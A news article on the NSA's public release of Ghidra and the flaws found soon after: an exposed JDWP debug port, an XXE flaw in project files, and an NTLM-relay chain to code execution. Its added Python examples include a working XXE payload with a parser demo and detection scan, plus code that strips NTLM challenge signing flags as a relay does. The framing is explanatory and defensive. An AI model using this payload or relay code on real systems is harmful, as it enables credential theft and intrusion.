NSA releases Ghidra, a free software reverse engineering toolkit - Critical vulnerability in the NSA Ghidra tool

At the RSA security conference today, the National Security Agency released Ghidra, a free software reverse engineering tool that the agency had been using internally for well over a decade. The tool is useful for software engineers in general, but malware analysts will benefit from it first and foremost. The NSA's stated plan in releasing Ghidra is to let security researchers get used to working with it before applying for positions at the NSA or at the other government intelligence agencies with which the NSA had previously shared Ghidra in private. Ghidra is currently available for download only through its official website, but the NSA also plans to release its source code under an open source license on GitHub. News that the NSA was going to release Ghidra first broke at the start of the year, and the tool has been on everybody's mind for the past two months. The reason is that Ghidra is a free alternative to IDA Pro, a similar reverse engineering tool that is only available under an expensive commercial license, priced in the thousands of US dollars per year. Because it is free, most experts expect Ghidra to take a large share of the reverse engineering tool market within weeks, especially since early user reviews are almost entirely positive.

As for its technical features, Ghidra is coded in Java, has a graphical user interface (GUI), and works on Windows, Mac, and Linux. According to Rob Joyce, Senior Advisor at the National Security Agency and the NSA official who announced the tool's release today at the RSA conference, Ghidra can analyze binaries written for a wide variety of architectures, and can be extended with more if ever needed. Installing Ghidra is as simple as unpacking a ZIP archive. The only requirement is a Java Development Kit, version 11 or later, which is needed to run the application. More on the installation routine can be found in the tool's official docs. Besides an installation guide, Ghidra's docs also come with classes and exercises at beginner, intermediate, and advanced levels that will help users get used to the tool's GUI, which is very different from that of similar tools. You're an IDA Pro power user? No problem, there's a guide for that too. Need a keyboard shortcut cheatsheet? No problem, there's one hosted online. Don't like the bright GUI? No problem, there's a dark mode included in Ghidra's settings section. At the time of this article, an hour after the tool's release, the reaction from the infosec (information security) community has been almost entirely positive, with glowing reviews from some of the biggest names in the cyber-security industry.

Ghidra may not be the IDA Pro killer most experts expected, since IDA Pro still offers a debugger component that Ghidra lacks, but things are looking up. Because Ghidra's code will be open-sourced, it will be open to community contributions, and many expect it to gain a debugger in the future, allowing malware analysts to jump ship and stop paying a fortune for IDA licenses. The infosec community has already started contributing back to Ghidra, even though the tool's source code hasn't been published on GitHub yet. Just minutes after the release, Matthew Hickey, co-founder and director of UK-based cyber-security firm Hacker House, reported the first security issue in the NSA's tool: when launched in its "debug mode," Ghidra starts a Java debugger (JDWP) listener that is bound to all network interfaces rather than to localhost, so anyone who can reach that port over the network can attach to the running JVM and run code inside it. The issue does not affect Ghidra's normal mode, and fixing it (binding the listener to the loopback address) should be a one-line change, according to Hickey.

"By open-sourcing GHIDRA, the NSA will benefit from a diverse user base whose feedback will make the tool even more effective. For underprivileged cyber teams grappling with a lack of personnel or resources, the free tool is a game changer to easing the barrier of entry into the cyber workforce and raising the proficiency of these teams. As a user of this tool for years, I cannot wait to see how it improves in the hands of my peers," Patrick Miller, security researcher at Raytheon Intelligence, Information and Services, told ZDNet via email. The news of the NSA open-sourcing one of its internal tools should no longer come as a surprise. The NSA has open-sourced all sorts of tools over the past few years, the most successful of them being Apache NiFi, a project for automating data flows between systems, which has become a favorite on the cloud computing scene. In total, the NSA has open-sourced 32 projects as part of its Technology Transfer Program (TTP) so far and has most recently even opened an official GitHub account. Ghidra has already been made available as a package for Arch Linux, a distribution popular with security researchers and hackers of every hat color.



Experts found an XML external entity (XXE) vulnerability that can be exploited by an attacker able to trick a user into opening or restoring a specially crafted project. The issue lies in the project open/restore process. To reproduce it, create a project, close it, and put an XXE payload in any of the XML files in the project directory; when the project is opened again, the parser resolves the external entity and the payload fires. “Project open/restore is susceptible to XML External Entity Expansion attacks. This can be exploited in various ways by getting someone to open/restore a project prepared by attacker.” reads the description published in a report on GitHub.
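To make the mechanism concrete, here is an added example, written for this page and not taken from Ghidra or from the GitHub report, using only Python's standard library: a project XML file booby-trapped with an external entity is parsed once by a parser configured to resolve external entities (the vulnerable behaviour) and once by one that is not (the hardened configuration), and the project directory is scanned for DOCTYPE/ENTITY declarations, a check a user could run before opening an untrusted project. The file names (`project.xml`, `secret.txt`), the payload and the secret file are constructed for the demo; the SYSTEM identifier points at a local file so the script runs offline, whereas a real attacker would point it at a server they control.

```python
"""
Added example (not Ghidra's code): an XXE payload planted in a project XML file,
opened with a parser that resolves external entities and with one that does not,
plus a pre-open scan of the project directory. Standard library only.
"""
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed payload. The SYSTEM identifier points at a local file here so the demo
# runs offline; an attacker points it at a server they control (file exfiltration or,
# as in the Tencent research, an HTTP server that demands NTLM authentication).
PAYLOAD_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE PROJECT [
  <!ENTITY xxe SYSTEM "{system_id}">
]>
<PROJECT NAME="demo">
  <DESCRIPTION>&xxe;</DESCRIPTION>
</PROJECT>
"""

# A saved project file has no business carrying a DOCTYPE or ENTITY declaration.
XXE_INDICATOR = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class _TextCollector(xml.sax.ContentHandler):
    """Collects character data so we can see what the parser substituted for &xxe;."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_project_xml(path, resolve_external_entities):
    """Parse one XML file and return its (stripped) text content.

    resolve_external_entities=True reproduces the vulnerable behaviour: the entity's
    SYSTEM identifier is fetched and inlined. False is the hardened configuration.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(path)
    return "".join(collector.parts).strip()


def find_xxe_indicators(project_dir):
    """Return the files under project_dir that carry a DOCTYPE or ENTITY declaration."""
    flagged = []
    for root, _dirs, files in os.walk(project_dir):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                if XXE_INDICATOR.search(fh.read()):
                    flagged.append(path)
    return sorted(flagged)


def demo():
    """Build a throwaway 'project' (constructed), open it both ways, and scan it."""
    with tempfile.TemporaryDirectory() as project_dir:
        secret = os.path.join(project_dir, "secret.txt")        # stands in for any local file
        with open(secret, "w") as fh:
            fh.write("s3cret-token")
        project_xml = os.path.join(project_dir, "project.xml")  # constructed file name
        with open(project_xml, "w") as fh:
            fh.write(PAYLOAD_TEMPLATE.format(system_id=secret))

        return {
            "vulnerable": parse_project_xml(project_xml, resolve_external_entities=True),
            "hardened": parse_project_xml(project_xml, resolve_external_entities=False),
            "flagged": [os.path.basename(p) for p in find_xxe_indicators(project_dir)],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run as a script, it prints the contents of the secret file for the vulnerable configuration, an empty string for the hardened one, and flags `project.xml`. The same hardening applies to Java's SAX and DOM parsers, which is what a tool like Ghidra would use: disallow DOCTYPE declarations, or disable the external general and parameter entity features, before handing the parser an attacker-supplied project file.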

Experts from Tencent Security also published an analysis showing how the XXE flaw can be chained into remote code execution on the victim's machine. “Based on our prior research on XXE vulnerability exploitation, we found that attackers can abuse Java features and weaknesses in NTLM protocol in Windows operating system to achieve remote code execution,” reads the analysis. The researchers showed that an attacker can set up an HTTP server that demands NTLM authentication and then use the XXE (or any SSRF) to make the victim's Java process connect to it, which forces the victim's machine to authenticate to the attacker's server with NTLM; the attacker then relays that authentication exchange back to the victim's own SMB service.

“It is worth noticing that the NTLM has two versions, NTLMv1 and NTLMv2. When authenticating with NTLMv1, attacker can directly relay the Net-NTLM Hash to the victim’s SMB service. In the SMBv2 case, attacker must first modify the Negotiate Flags in the Type 2 Message to unset Negotiate Always Sign and Negotiate 0x00004000 flags.” continues the analysis. “This transforms it from local authentication to network authentication, and also strips the signature.”
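The flag rewrite that quote describes can be shown on a constructed message. What follows is an added Python example, not Tencent's proof-of-concept and not part of Ghidra: it builds a minimal Type 2 (CHALLENGE_MESSAGE) laid out as in MS-NLMP (8-byte signature, 4-byte message type, 8-byte TargetName fields, 4-byte NegotiateFlags at byte offset 20, 8-byte server challenge, 8 reserved bytes, 8-byte TargetInfo fields, then the payload), parses it back, and clears NTLMSSP_NEGOTIATE_ALWAYS_SIGN (0x00008000) and the 0x00004000 flag (listed in older NTLM references as Negotiate Local Call), exactly the edit a relay makes before forwarding the challenge to the victim. The target name and challenge bytes are made up for the demo.

```python
"""
Added example (not Tencent's PoC, not Ghidra code): the Type 2 flag rewrite from the
analysis quoted above, done on a constructed NTLM CHALLENGE_MESSAGE.
Field offsets follow MS-NLMP section 2.2.1.2; flag values follow section 2.2.2.5.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2

# NegotiateFlags bits used here (MS-NLMP 2.2.2.5)
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_LOCAL_CALL = 0x00004000   # the "Negotiate 0x00004000" flag in the quote
NEGOTIATE_ALWAYS_SIGN = 0x00008000
TARGET_TYPE_SERVER = 0x00020000

FLAGS_OFFSET = 20   # Signature(8) + MessageType(4) + TargetNameFields(8)
HEADER_LEN = 48     # fixed fields, without the optional 8-byte Version field


def build_challenge(flags, server_challenge, target_name="SRV"):
    """Build a minimal CHALLENGE_MESSAGE with a target name and an empty TargetInfo."""
    if len(server_challenge) != 8:
        raise ValueError("ServerChallenge must be 8 bytes")
    name = target_name.encode("utf-16-le")
    msg = NTLMSSP_SIGNATURE
    msg += struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(name), len(name), HEADER_LEN)      # TargetNameFields
    msg += struct.pack("<I", flags)                                    # NegotiateFlags
    msg += server_challenge                                            # ServerChallenge
    msg += b"\x00" * 8                                                 # Reserved
    msg += struct.pack("<HHI", 0, 0, HEADER_LEN + len(name))           # TargetInfoFields
    assert len(msg) == HEADER_LEN
    return msg + name


def parse_challenge(msg):
    """Validate the message and return its flags, challenge and target name."""
    if msg[:8] != NTLMSSP_SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != CHALLENGE_MESSAGE:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    name_len, _name_max, name_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, FLAGS_OFFSET)[0]
    raw_name = msg[name_off:name_off + name_len]
    target = raw_name.decode("utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii")
    return {"flags": flags, "server_challenge": msg[24:32], "target_name": target}


def downgrade_challenge(msg):
    """Return a copy of msg with ALWAYS_SIGN and LOCAL_CALL cleared, as a relay does.

    Only the 4 flag bytes change; challenge, names and payload are forwarded intact,
    which is why the victim's response still validates against the server's challenge.
    """
    parsed = parse_challenge(msg)   # validates the signature and message type first
    new_flags = parsed["flags"] & ~(NEGOTIATE_ALWAYS_SIGN | NEGOTIATE_LOCAL_CALL)
    out = bytearray(msg)
    struct.pack_into("<I", out, FLAGS_OFFSET, new_flags)
    return bytes(out)


def flag_names(flags):
    """Human-readable view of the flags this example knows about."""
    table = {
        NEGOTIATE_UNICODE: "UNICODE", NEGOTIATE_NTLM: "NTLM",
        NEGOTIATE_LOCAL_CALL: "LOCAL_CALL", NEGOTIATE_ALWAYS_SIGN: "ALWAYS_SIGN",
        TARGET_TYPE_SERVER: "TARGET_TYPE_SERVER",
    }
    return [name for bit, name in sorted(table.items()) if flags & bit]


if __name__ == "__main__":
    original = build_challenge(
        NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_LOCAL_CALL
        | NEGOTIATE_ALWAYS_SIGN | TARGET_TYPE_SERVER,
        b"\x11" * 8,                 # constructed challenge, not a captured one
    )
    relayed = downgrade_challenge(original)
    print("before:", flag_names(parse_challenge(original)["flags"]))
    print("after: ", flag_names(parse_challenge(relayed)["flags"]))
```

The defensive reading of the same bytes: when the SMB server requires signing, a session whose NTLM flags have been stripped this way cannot produce valid signatures, because the relay never learns the session key, so the relayed session is rejected. That is why enabling SMB signing is among the mitigations listed below.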

The researchers published proof-of-concept code for exploiting the XXE in the Ghidra suite. “When victim uses Ghidra to open this malicious project, attacker can obtain NTLM Hash from the victim’s machine, therefore execute arbitrary command on victim’s machine,” the researchers conclude. The suggested mitigations are to configure the Windows firewall to block incoming SMB connections, to enable SMB signing where an SMB server is required, and to upgrade to the latest JDK. The XXE vulnerability itself is addressed in Ghidra version 9.0.1, which is expected to be available very soon.

The framework was first publicly mentioned in the CIA Vault 7 dump leaked in 2017. WikiLeaks obtained thousands of files allegedly originating from a CIA high-security network that detail the CIA's hacking techniques, tools, and capabilities. Digging through the huge trove of files, it is possible to find references to GHIDRA, a Java-based reverse engineering tool.

